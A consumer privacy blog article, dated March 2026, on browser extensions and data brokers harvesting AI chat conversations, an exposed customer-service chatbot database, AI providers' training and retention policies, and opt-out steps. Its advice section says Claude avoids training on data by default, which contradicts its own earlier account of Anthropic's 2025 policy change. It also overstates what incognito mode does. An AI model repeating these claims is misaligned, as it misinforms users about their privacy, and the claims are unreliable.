Your AI Chats Are Being Sold: Browser Extensions, Data Brokers, and the March 2026 Privacy Audit

Browser extensions are harvesting ChatGPT and Claude conversations for sale. Here's what's happening and how to protect yourself.

Close-up of a padlock on a laptop keyboard

The browser extension you installed to “improve your AI experience” might be selling your conversations to data brokers. A wave of discoveries in early 2026 has exposed a disturbing pattern: millions of AI chatbot users are having their private conversations harvested, packaged, and sold without meaningful consent.

The 900,000-User Heist

In January 2026, security researchers at OX Security uncovered a malware campaign that had stolen ChatGPT and DeepSeek conversations from nearly 900,000 Chrome users. The campaign, dubbed “Prompt Poaching,” operated through extensions that impersonated a legitimate AI assistant tool called AITOPIA.

The malicious extensions requested consent for “anonymous, non-identifiable analytics data” while actually exfiltrating complete conversation content. Every prompt, every response, every 30 minutes—all sent to remote servers.

Microsoft’s Defender Security Research Team later confirmed the attack affected more than 20,000 enterprise tenants. That means corporate secrets, proprietary code, and confidential business discussions were compromised alongside personal conversations.

The Data Broker Pipeline

But outright malware isn’t the only threat. According to Futurism, a seemingly legitimate VPN extension called Urban VPN Proxy—with 6 million users—has been harvesting AI conversations and selling them through its affiliated data broker, BiScience.

The extension’s “executor” scripts intercept conversations from ChatGPT, Claude, Gemini, DeepSeek, and Grok regardless of whether the VPN is active. There’s no toggle to disable it. The data collection started around July 2025, and the privacy policy—buried in legalese—admits the company “shares Web Browsing Data” with BiScience for “marketing analytics.”

What gets harvested? According to security researchers: medical questions, financial details, proprietary code, and personal dilemmas. All searchable. All for sale.

The Sears Chatbot Disaster

Even if you’ve never installed a suspicious extension, your AI conversations may be exposed through the services you use.

Security researcher Jeremy Fowler discovered three unprotected databases containing 3.7 million records from Sears Home Services’ AI chatbot “Samantha.” The exposed data included:

  • 2.1 million chat transcripts
  • 1.4 million audio recordings (3.9TB total)
  • Customer names, addresses, phone numbers, and appointment details
  • Recordings spanning 2024 to 2026

Some audio files captured up to 4 hours of continuous recording, including conversations completely unrelated to the customer service call. The databases were accessible to anyone with a web browser—no password, no encryption.

The privacy implications extend beyond identity theft. Those 1.4 million voice recordings represent raw material for voice cloning attacks. Criminals need as little as 30 seconds of audio to create convincing deepfakes; these databases offered hours per customer.

What the AI Companies Actually Do With Your Data

Beyond third-party threats, the chatbot providers themselves have varying—and recently changed—policies on data use.

ChatGPT (OpenAI)

ChatGPT uses your conversations for training by default on Free, Plus, and Pro plans. You can opt out through Settings > Data Controls, but OpenAI still retains conversations for 30 days for “safety monitoring.” The Temporary Chat feature excludes conversations from training and history.

Business accounts (Team, Enterprise, API) are excluded from training by default.

Claude (Anthropic)

Anthropic changed its policy in September 2025. Previously, Claude didn’t use conversations for training by default. Now, users on Free, Pro, and Max plans were asked to choose, with a deadline of October 8, 2025. If you opted in, Anthropic can retain your data for up to five years. If you opted out, it’s 30 days.

Previous conversations shared before opting out may already be in training datasets.

Gemini (Google)

Google retains Gemini conversations for 18 months by default, adjustable to 3 or 36 months. Human reviewers may examine your conversations. The “Personal Intelligence” dashboard introduced in early 2026 groups Gmail and cross-app access permissions together.

You can disable training and human review at myaccount.google.com > Data and Privacy > Gemini Apps Activity.

Copilot (Microsoft)

Microsoft takes a stronger stance: Copilot doesn’t use customer data to train foundation models. Prompts and responses stay within the Microsoft 365 service boundary with enterprise data protection.

Grok (xAI)

Grok’s privacy policy is notably less restrictive. If you use Grok without logging in, you grant xAI “full rights to use any data you provide” for model training. The UK’s Information Commissioner’s Office has opened a formal investigation into xAI’s data practices.

How to Protect Yourself

Audit Your Browser Extensions

  1. Open Chrome’s extension manager (chrome://extensions)
  2. Review each extension’s permissions—anything with “Read and change all your data on all websites” can intercept AI chats
  3. Remove extensions you don’t actively use
  4. Check remaining extensions against known malicious lists

The Prompt Poaching extensions have been removed from Chrome Web Store, but copycat malware continues to appear.

Opt Out Where Possible

ChatGPT: Settings > Data Controls > toggle off “Improve the model for everyone”

Claude: Settings > Privacy > select “Do not use my data for training”

Gemini: myaccount.google.com > Data and Privacy > Gemini Apps Activity > Turn off

Grok: Log in before using (anonymous use grants full data rights)

Use Privacy-Preserving Features

  • ChatGPT’s Temporary Chat: Conversations aren’t saved to history or used for training
  • Claude’s built-in protections: Already designed not to use data for training by default
  • Incognito/private browsing: Doesn’t prevent the service from collecting data, but does prevent browser extensions from accessing it

Don’t Share Sensitive Information

Regardless of privacy settings, avoid sharing:

  • Personal identifying information (names, addresses, birthdates)
  • Medical records or health concerns
  • Financial account numbers
  • Proprietary business code
  • Passwords or credentials

If you must discuss sensitive topics, use generic terms or hypotheticals.

Consider Local AI

For maximum privacy, local models like Llama, Mistral, or Qwen running on your own hardware never send data anywhere. Tools like Ollama make this increasingly practical for everyday use.

What This Means

The AI privacy landscape in March 2026 is a minefield. Browser extensions silently harvest conversations. Data brokers package and sell your prompts. Corporate chatbot implementations leak millions of records. And even the “legitimate” providers have policies that most users have never read.

The default assumption should be that anything you type into an AI chatbot could become public. Until that changes—through regulation, enforcement, or a fundamental shift in how these services operate—treat every conversation accordingly.


This article is part of Intelligibberish’s ongoing AI privacy audit series. For the full audit from March 19, 2026, see our comprehensive opt-out guide.